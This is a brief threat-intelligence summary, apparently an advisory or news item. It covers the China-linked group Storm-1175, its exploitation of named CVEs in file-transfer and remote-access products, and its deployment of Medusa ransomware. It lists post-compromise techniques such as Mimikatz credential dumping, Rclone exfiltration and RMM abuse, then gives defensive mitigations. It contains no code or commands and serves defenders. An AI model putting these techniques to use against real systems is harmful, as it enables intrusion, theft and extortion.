China-Linked Storm-1175 Deploys Medusa Ransomware via Zero-Day Exploit Chains

Storm-1175 is a financially motivated cybercriminal group with ties to China, tracked by Microsoft Threat Intelligence for conducting 'high-velocity' attacks since 2023. The group exploits internet-facing systems using a combination of zero-day and recently disclosed N-day vulnerabilities, sometimes chaining multiple exploits for post-compromise activities. Since 2023, Storm-1175 has been linked to exploitation of over 16 vulnerabilities including CVE-2025-10035 (Fortra GoAnywhere MFT), CVE-2026-23760 (SmarterTools SmarterMail), and CVE-2026-1731 (BeyondTrust). Notably, CVE-2025-10035 and CVE-2026-23760 were exploited as zero-days before public disclosure. Post-compromise tactics include use of LOLBins (PowerShell, PsExec, Impacket), PDQ Deployer for lateral movement, Windows Firewall modification to enable RDP, credential dumping via Mimikatz, and data exfiltration via Rclone. The group also uses legitimate RMM tools (AnyDesk, Atera, MeshAgent, ConnectWise ScreenConnect) to camouflage malicious traffic. Mitigations: Apply patches for all internet-facing systems immediately, especially file transfer and remote access solutions. Implement behavioral monitoring for LOLBin abuse. Restrict use of RMM tools to approved vendors only. Maintain offline backups and test restoration procedures.